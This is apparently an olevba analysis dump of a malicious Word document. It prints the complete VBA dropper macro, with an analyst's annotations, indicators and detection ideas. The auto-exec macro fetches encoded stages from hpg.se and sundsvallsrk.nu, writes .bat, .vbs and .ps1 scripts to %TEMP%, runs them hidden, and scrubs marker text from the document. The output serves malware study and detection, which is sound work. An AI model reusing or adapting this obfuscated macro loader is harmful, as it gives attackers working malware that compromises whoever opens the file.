- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- automa~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: automa~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: automa~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: Word runs Auto_Open when the document is opened (olevba flags it
- ' as AutoExec in the ANALYSIS table below). It does nothing itself except chain into the
- ' dropper routine; AutoOpen and Workbook_Open further down are aliases for the same call.
- Sub Auto_Open()
- huefhiuwefhwefh
- End Sub
- ' Dropper routine — analysis notes, grounded only in what this listing shows:
- '   * stage-1 config is fetched with MSXML2.ServerXMLHTTP from hpg.se, falling back to
- '     sundsvallsrk.nu when the first body is empty, base64-decoded (Module1.Decode) and
- '     split into <text..>/<stext..> tagged sections (Module1.Tort);
- '   * a second GET (.../tmp/lns.txt) supplies the value embedded as strRT / $ggtt;
- '   * script files named <random>.bat and .vbs (plus .ps1 on the VRR = "1" branch) are
- '     written to %TEMP% and the .bat is launched hidden via Module1.Freat -> Shell(path, 0);
- '   * Module2.Nybdqwd then edits the open document's own text between <object>..</object>
- '     and <module>..</module> markers (delete / recolor / strip the markers).
- ' Indicator note: olevba's IOC table only extracted the two literal lns.txt URLs. The
- ' 1623782.txt URLs on the same hosts and the savepic.su image URLs are assembled by string
- ' concatenation and are not in the table; they belong in the same indicator set.
- ' Detection angles: WINWORD writing .bat/.vbs/.ps1 under %TEMP% followed by a cmd.exe child,
- ' and outbound HTTP from Word to the hosts above.
- Sub huefhiuwefhwefh()
- Dim huwe, auwd As Integer
- Dim retVal As Variant
- ' FL2: random numeric stem shared by all dropped file names (Huwd = CStr(Int(a * Rnd + 10000)))
- HUWQD = Module1.Huwd(10000)
- FL2 = "" & HUWQD
- HPPSDJ = "Temp"
- ' PH2: %TEMP%\  — Module1.Bad is a thin wrapper over Environ
- PH2 = Module1.Bad("" & HPPSDJ) + "\"
- NDUWGD = "461237618273612"
- HYWDAX = "baUhdwuqhdiqwududqwwgdjssadt"
- WKDOQ = NDUWGD
- ' PSFL = FL2 & ".ps1"   (Chr(Asc("s")) is just "s")
- PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
- + _
- "1"
- ' VBFL = FL2 & ".vbs"   (Chr(50 - 4) = Chr(46) = ".")
- VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
- huwe = 1
- ' BAFL = FL2 & ".bat"   (Sgn(-22)+11+10+25+1+0 = 46 = "."; Left/Right of HYWDAX give "ba" and "t")
- BAFL = FL2 + Chr(Sgn(-22) + 11 + 10 + 25 + huwe + 0) + Left(HYWDAX, 2) + Right(HYWDAX, 1)
- ' Marker words later searched for in the document body by Module2.Nybdqwd: "object", "module"
- INTG = "o" & "bject"
- AFTG = "module"
- ' SXE = ".exe", PHT = "http://", SPIC = "http://savepic.su/"
- SXE = "" & Chr(Asc(".")) & Chr(Asc("e")) & "xe" & ""
- GNG = ".png"
- PHT = "" & "htt" & "p://" & ""
- SPIC = PHT + "sav" & "epic.su/"
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = PH2 + BAFL
- ' Consecutive FreeFile calls with no Open in between return the same file number; this only
- ' works because every Open below is Closed before the next one.
- DRT = FreeFile
- BFT = FreeFile
- CFT = FreeFile
- DFT = FreeFile
- EFT = FreeFile
- ' Stage-1 config URL (primary host)
- PBIN = PHT + "hpg.se/tmp/1623782.txt"
- Dim obg, obg4 As Object
- Dim asdwq As String
- ' Synchronous GET; response body consumed as text
- Set obg = CreateObject("MSXML2.ServerXMLHTTP")
- obg.Open "GET", PBIN
- obg.Send ""
- CONT = obg.ResponseText
- asdwq = CONT
- HQUWDAAA = "0"
- ' Fallback host when the first body is empty. Note the ResponseText read inside this branch
- ' still goes through obg (the first object), not obg4, so the fallback body is never actually
- ' used; HQUWDAAA = "1" does still switch the second-stage URL below to the fallback host.
- If (asdwq = "") Then
- PBIN = PHT + "sundsvallsrk.nu/tmp/1623782.txt"
- Set obg4 = _
- CreateObject("MSXML2.ServerXMLHTTP")
- obg4.Open "GET", PBIN
- obg4.Send ""
- CONT = obg.ResponseText
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- ' Base64-decode the blob (MSXML bin.base64 node) and extract tagged sections.
- ' TVT* sections feed the VRR = "1" branch, XPT* sections the VRR = "0" branch.
- CONT = Module1.Decode(asdwq)
- TVT10 = Module1.Tort(CONT, "text10")
- TVT20 = Module1.Tort(CONT, "text20")
- TVT21 = Module1.Tort(CONT, "text21")
- TVT30 = Module1.Tort(CONT, "text30")
- TVT31 = Module1.Tort(CONT, "text31")
- XPT1 = Module1.Tort(CONT, "stext1")
- XPT2 = Module1.Tort(CONT, "stext2")
- XPT3 = Module1.Tort(CONT, "stext3")
- ' Environment discriminator: USERPROFILE containing "sers\" (a C:\Users\... profile path)
- ' selects VRR = "1"; anything else (presumably an older profile layout — confirm) selects "0".
- WVR = Module1.Bad("USERPROFILE")
- post1 = InStr(WVR, "sers\")
- If (post1 <> 0) Then
- VRR = "1"
- Else
- VRR = "0"
- End If
- Module1.WaitFor (1)
- Dim obg2 As Object
- ' Second download (lns.txt) from whichever host is selected; its text lands in SEXX and is
- ' embedded verbatim into the dropped .vbs / .ps1 below.
- Set obg2 = _
- CreateObject("MSXML2.ServerXMLHTTP")
- MIWDWQ = "http://hpg.se/tmp/lns.txt"
- If (HQUWDAAA = "1") Then
- MIWDWQ = "http://sundsvallsrk.nu/tmp/lns.txt"
- End If
- obg2.Open "GET", MIWDWQ
- obg2.Send ""
- SEXX = obg2.ResponseText
- PSTB = PBIN + "123123123"
- ' STAR1/STAR2 = http://savepic.su/5550684.png and .../5540444.png, passed to the dropped
- ' scripts as statRT / $stat. Their role is not determinable from this listing — confirm.
- STAR1 = SPIC + "5550684" + GNG
- STAR2 = SPIC + "5540444" + GNG
- ' FF = "8.exe": the file name the dropped .vbs joins onto %TEMP% (strTecation)
- FFQ = "8"
- FF = FFQ + SXE
- ' Branch A (VRR = "0"): .bat = XPT1 + three "set" lines + XPT2; .vbs = config lines + XPT3;
- ' then the .bat is executed.
- If (VRR = "0") Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module1.WaitFor (2)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- Module1.WaitFor (2)
- ' Module1.Freat -> Shell(BAPTH, 0): runs the .bat with a hidden window
- NTH1 = Module1.Freat(retVal, BAPTH)
- End If
- ' Branch B (VRR = "1"): .ps1 = variables + TVT10; .vbs = TVT30 + currentFile + TVT31;
- ' .bat = @echo off + TVT20 + two "set" lines + TVT21; then the .bat is executed.
- If (VRR = "1") Then
- Open PSPTH For Output As #CFT
- Print #CFT, "$aisjd = '123';"
- Print #CFT, "$stat = '" + STAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + "';"
- Print #CFT, "$wehs = '" + FL2 + "';"
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, "@echo off"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module1.WaitFor (1)
- NTH2 = Module1.Freat(retVal, BAPTH)
- End If
- ' Document clean-up via Module2.Nybdqwd: JUW = "/", AKK = "<", ZKK = ">".
- ' Mode 1 deletes the text between <object> and </object>, mode 2 colours the text between
- ' <module> and </module> black, mode 3 replaces each marker with a space. This implies the
- ' document body itself contained marker-delimited text; what it held is not visible here.
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
- NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- ' Second auto-exec alias (Word's AutoOpen spelling); forwards to Auto_Open.
- Sub AutoOpen()
- Auto_Open
- End Sub
- ' Excel auto-exec alias so the same routine fires if the macros are hosted in a workbook.
- Sub Workbook_Open()
- Auto_Open
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://hpg.se/tmp/ln | URL |
- | | s.txt | |
- | IOC | http://sundsvallsrk. | URL |
- | | nu/tmp/lns.txt | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: automa~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns a random integer in [10000, 10000 + a) as a string; with a = 10000 (the only call
- ' in this listing) that is a 5-digit name stem for the dropped files.
- Public Function Huwd(a As Integer)
- Huwd = CStr(Int((a * Rnd) + 10000))
- End Function
- ' Busy-wait for NumOfSeconds using Timer (seconds since midnight) and DoEvents. The delays
- ' used by the dropper are 1-2 s each (about 3-5 s total), i.e. short pauses between file
- ' writes rather than a long sleep.
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- ' Execution primitive: Shell(b, 0) runs the command/path in b with window style 0 (hidden)
- ' and returns the task id. The line continuation splits "Shell" from the assignment,
- ' presumably to defeat naive keyword scanning; olevba still flags Shell below.
- Public Function Freat(a As Variant, b)
- a = _
- Shell(b, 0)
- Freat = a
- End Function
- ' Returns the text between "<b>" and "</b>" in a. The hard-coded +8 only lines up because
- ' every tag used by the caller ("<text10>", "<stext1>", ...) is exactly 8 characters long.
- ' If the opening tag is missing, InStr returns 0, lent goes negative and Mid raises a
- ' runtime error — the macro fails loudly on an empty or malformed download.
- Public Function Tort(a, b As String)
- Dim krd, lent As Integer
- krd = InStr(1, a, "<" + b + ">") + 8
- lent = InStr(1, a, "<" + "/" + b + ">") - krd
- KLMN = Mid(a, krd, lent)
- AUHWUD = KLMN
- Tort = AUHWUD
- End Function
- ' Not referenced anywhere in this listing. Assigns to Quick instead of Dtgt (looks like a
- ' copy of the function below), so Dtgt itself would return Empty.
- Public Function Dtgt(a As String)
- Quick = GetObject(a)
- End Function
- ' GetObject wrapper; not referenced anywhere in this listing (leftover or unused capability).
- Public Function Quick(a As String)
- Quick = GetObject(a)
- End Function
- ' Environ wrapper, used for "Temp" and "USERPROFILE". The line continuation before Environ
- ' presumably serves the same keyword-splitting purpose as in Freat.
- Public Function Bad(a As String)
- Bad = _
- Environ(a)
- End Function
- ' Base64 decoder without a custom implementation: an MSXML2.DOMDocument element with
- ' DataType "bin.base64" decodes .Text on read of .nodeTypedValue (a byte array), which is
- ' then coerced to the String return value.
- ' NOTE(review): VBA copies Byte() into a String byte-for-byte (UTF-16 code units), so the
- ' downstream InStr searches in Tort only work if the server-side payload encoding matches
- ' — confirm against a captured sample.
- Public Function Decode(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Set objXML = CreateObject("MSXML2.DOMDocument")
- Set objNode = objXML.createElement("b64")
- objNode.DataType = "bin.base64"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Decode = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: automa~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Edits the open document's own text. Finds a, collapses to its end, then finds b and
- ' collapses to its start, so selRange spans the text between the two markers. Mode c:
- '   1 - delete that span; 2 - set its font colour to black (suggests the text was hidden
- '   by colour before — confirm); 3 - replace every occurrence of a with a space (b unused).
- ' The function never assigns its return value, so callers receive Empty. Note that
- ' "Dim hhhg, selRange As Range" types only selRange as Range; hhhg is a Variant.
- ' The two NYQDIAYGDH / QUDHDHGJDWK literals are never used (filler).
- Public Function Nybdqwd(a As String, b As String, c As Integer)
- Dim selectedText As String
- Dim hhhg, selRange As Range
- Set hhhg = ActiveDocument.Range
- With hhhg.Find
- .Text = a
- .MatchWholeWord = True
- hhhg.Find.Execute
- hhhg.Collapse direction:=wdCollapseEnd
- NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
- Set selRange = ActiveDocument.Range
- QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
- selRange.Start = hhhg.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- hhhg.Collapse direction:=wdCollapseStart
- selRange.End = hhhg.Start
- If (c = 1) Then
- selectedText = selRange.Delete
- End If
- If (c = 2) Then
- selRange.Font.Color = wdColorBlack
- End If
- If (c = 3) Then
- ' Replace-all of the marker string itself (the span between markers is left alone here)
- With hhhg.Find
- .Text = a
- .Replacement.Text = Chr(32)
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+